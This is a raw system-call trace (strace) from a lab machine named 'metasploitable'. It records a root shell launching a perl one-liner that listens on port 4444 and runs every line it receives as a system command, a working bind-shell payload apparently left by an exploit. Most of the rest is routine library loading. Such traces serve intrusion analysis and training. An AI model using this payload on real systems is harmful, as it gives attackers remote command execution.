8159  07:22:08.848884 mmap2(0xb7d65000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d65000

8159  07:22:08.848899 close(1)          = 0

8159  07:22:08.848912 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8159  07:22:08.848925 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

8159  07:22:08.848940 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

8159  07:22:08.849029 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

8159  07:22:08.849046 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d52000

8159  07:22:08.849058 mmap2(0xb7d5b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d5b000

8159  07:22:08.849073 close(1)          = 0

8159  07:22:08.849093 munmap(0xb7f0d000, 29913) = 0

8159  07:22:08.849094 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

8159  07:22:08.849094 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

8159  07:22:08.849094 _llseek(1, 0, [0], SEEK_CUR) = 0

8159  07:22:08.849094 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

8159  07:22:08.849095 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f14000

8159  07:22:08.849095 _llseek(1, 1624, [1624], SEEK_SET) = 0

8159  07:22:08.849095 munmap(0xb7f14000, 1624) = 0

8159  07:22:08.849095 close(1)          = 0

8159  07:22:08.849095 getpgrp()         = 3831

8159  07:22:08.849096 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

8159  07:22:08.849101 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

8159  07:22:08.849117 brk(0x8101000)    = 0x8101000

8159  07:22:08.849149 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8159  07:22:08.849164 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8159  07:22:08.849178 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8159  07:22:08.849215 brk(0x8102000)    = 0x8102000

8159  07:22:08.849241 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

8159  07:22:08.849260 stat64("/sbin/AB", 0xbfbe7238) = -1 ENOENT (No such file or directory)

8159  07:22:08.849303 stat64("/bin/AB", 0xbfbe7238) = -1 ENOENT (No such file or directory)

8159  07:22:08.849333 stat64("/usr/sbin/AB", 0xbfbe7238) = -1 ENOENT (No such file or directory)

8159  07:22:08.849346 stat64("/usr/bin/AB", 0xbfbe7238) = -1 ENOENT (No such file or directory)

8159  07:22:08.849359 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

8159  07:22:08.849374 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d886f8) = 8160

8160  07:22:08.849419 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

8160  07:22:08.849437 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

8160  07:22:08.849451 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

8160  07:22:08.849462 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

8160  07:22:08.849478 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

8160  07:22:08.849494 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

8160  07:22:08.849506 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

8160  07:22:08.849561 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

8160  07:22:08.849576 --- SIGPIPE (Broken pipe) @ 0 (0) ---

8160  07:22:08.849642 exit_group(127)   = ?

8159  07:22:08.856448 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:22:08.856488 waitpid(8159,  <unfinished ...>

8159  07:22:08.856535 <... rt_sigprocmask resumed> NULL, 8) = 0

8159  07:22:08.865742 --- SIGCHLD (Child exited) @ 0 (0) ---

8159  07:22:08.865742 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 8160

8159  07:22:08.865742 waitpid(-1, 0xbfbe6eb8, WNOHANG) = -1 ECHILD (No child processes)

8159  07:22:08.865743 sigreturn()       = ? (mask now [])

8159  07:22:08.865757 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

8159  07:22:08.865773 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

8159  07:22:08.865784 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

8159  07:22:08.865796 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

8159  07:22:08.865814 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

8159  07:22:08.865826 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

8159  07:22:08.865862 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

8159  07:22:08.865882 stat64("/sbin/perl", 0xbfbe7268) = -1 ENOENT (No such file or directory)

8159  07:22:08.865894 stat64("/bin/perl", 0xbfbe7268) = -1 ENOENT (No such file or directory)

8159  07:22:08.865905 stat64("/usr/sbin/perl", 0xbfbe7268) = -1 ENOENT (No such file or directory)

8159  07:22:08.865917 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

8159  07:22:08.865935 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

8159  07:22:08.865960 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

8159  07:22:08.865975 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d886f8) = 8161

8161  07:22:08.866020 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

8161  07:22:08.866036 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

8161  07:22:08.866049 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

8161  07:22:08.866062 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

8161  07:22:08.866077 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

8161  07:22:08.866092 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

8161  07:22:08.866115 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

8161  07:22:08.866198 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

8161  07:22:08.866285 brk(0)            = 0x8153000

8161  07:22:08.866304 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8161  07:22:08.866320 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eed000

8161  07:22:08.866335 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

8161  07:22:08.866352 open("/etc/ld.so.cache", O_RDONLY) = 1

8161  07:22:08.866365 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

8161  07:22:08.866386 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ee5000

8161  07:22:08.866397 close(1)          = 0

8161  07:22:08.866408 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8161  07:22:08.866423 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

8161  07:22:08.866438 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

8161  07:22:08.866530 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

8161  07:22:08.866547 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ee1000

8161  07:22:08.866559 mmap2(0xb7ee3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ee3000

8161  07:22:08.866575 close(1)          = 0

8161  07:22:08.866587 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8161  07:22:08.866601 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

8161  07:22:08.866722 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

8161  07:22:08.866825 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

8161  07:22:08.866842 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ebc000

8161  07:22:08.866854 mmap2(0xb7edf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7edf000

8161  07:22:08.866870 close(1)          = 0

8161  07:22:08.866882 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8161  07:22:08.866896 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

8161  07:22:08.866910 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

8161  07:22:08.867000 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

8161  07:22:08.867017 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ebb000

8161  07:22:08.867030 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ea3000

8161  07:22:08.867041 mmap2(0xb7eb7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7eb7000

8161  07:22:08.867055 mmap2(0xb7eb9000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eb9000

8161  07:22:08.867069 close(1)          = 0

8161  07:22:08.867080 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8161  07:22:08.867094 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

8161  07:22:08.867107 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

8161  07:22:08.867240 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

8161  07:22:08.867259 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d54000

8161  07:22:08.867270 mmap2(0xb7e9d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7e9d000

8161  07:22:08.867285 mmap2(0xb7ea0000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ea0000

8161  07:22:08.867298 close(1)          = 0

8161  07:22:08.867311 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8161  07:22:08.867324 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

8161  07:22:08.867339 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

8161  07:22:08.867431 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

8161  07:22:08.867448 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d22000

8161  07:22:08.867460 mmap2(0xb7d2b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d2b000

8161  07:22:08.867474 mmap2(0xb7d2d000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d2d000

8161  07:22:08.867487 close(1)          = 0

8161  07:22:08.867511 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d21000

8161  07:22:08.867524 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d218c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

8161  07:22:08.867584 mprotect(0xb7e9d000, 4096, PROT_READ) = 0

8161  07:22:08.867611 munmap(0xb7ee5000, 29913) = 0

8161  07:22:08.867624 set_tid_address(0xb7d21908) = 8161

8161  07:22:08.867634 set_robust_list(0xb7d21910, 0xc) = 0

8161  07:22:08.867643 futex(0xbf9fce90, 0x81 /* FUTEX_??? */, 1) = 0

8161  07:22:08.867657 rt_sigaction(SIGRTMIN, {0xb7ea72c0, [], SA_SIGINFO}, NULL, 8) = 0

8161  07:22:08.867670 rt_sigaction(SIGRT_1, {0xb7ea7340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

8161  07:22:08.867711 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

8161  07:22:08.867740 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

8161  07:22:08.867759 uname({sys="Linux", node="metasploitable", ...}) = 0

8161  07:22:08.867805 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

8161  07:22:08.867851 brk(0)            = 0x8153000

8161  07:22:08.867860 brk(0x8174000)    = 0x8174000

8161  07:22:08.867903 getuid32()        = 0

8161  07:22:08.867913 geteuid32()       = 0

8161  07:22:08.867922 getgid32()        = 0

8161  07:22:08.867931 getegid32()       = 0

8161  07:22:08.867968 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d00000

8161  07:22:08.867995 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

8161  07:22:08.868012 read(1, "HJ\27\252", 4) = 4

8161  07:22:08.868025 close(1)          = 0

8161  07:22:08.868043 time(NULL)        = 1495624928

8161  07:22:08.868084 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbf9fcb60) = -1 ENOENT (No such file or directory)

8161  07:22:08.868102 stat64("/usr/local/lib/site_perl/5.8.8", 0xbf9fcb60) = -1 ENOENT (No such file or directory)

8161  07:22:08.868115 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbf9fcb60) = -1 ENOENT (No such file or directory)

8161  07:22:08.868130 stat64("/usr/local/lib/perl/5.8.7", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868142 stat64("/usr/local/share/perl/5.8.7", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868155 stat64("/usr/local/lib/perl/5.8.6", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868166 stat64("/usr/local/share/perl/5.8.6", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868211 stat64("/usr/local/lib/perl/5.8.4", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868241 stat64("/usr/local/share/perl/5.8.4", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868257 stat64("/usr/local/lib/perl/5.8.3", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868275 stat64("/usr/local/share/perl/5.8.3", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868293 stat64("/usr/local/lib/perl/5.8.2", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868312 stat64("/usr/local/share/perl/5.8.2", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868331 stat64("/usr/local/lib/perl/5.8.1", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868343 stat64("/usr/local/share/perl/5.8.1", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868355 stat64("/usr/local/lib/perl/5.8.0", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868366 stat64("/usr/local/share/perl/5.8.0", 0xbf9fcca0) = -1 ENOENT (No such file or directory)

8161  07:22:08.868390 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9fc998) = -1 ENOTTY (Inappropriate ioctl for device)

8161  07:22:08.868403 _llseek(0, 0, [0], SEEK_CUR) = 0

8161  07:22:08.868415 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9fc998) = -1 EBADF (Bad file descriptor)

8161  07:22:08.868426 _llseek(1, 0, 0xbf9fc9e0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

8161  07:22:08.868437 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9fc998) = -1 EINVAL (Invalid argument)

8161  07:22:08.868448 _llseek(2, 0, 0xbf9fc9e0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

8161  07:22:08.868458 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

8161  07:22:08.868471 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9fca58) = -1 ENOTTY (Inappropriate ioctl for device)

8161  07:22:08.868481 _llseek(1, 0, [0], SEEK_CUR) = 0

8161  07:22:08.868492 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

8161  07:22:08.868503 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

8161  07:22:08.868522 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

8161  07:22:08.868576 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

8161  07:22:08.868621 getppid()         = 8159

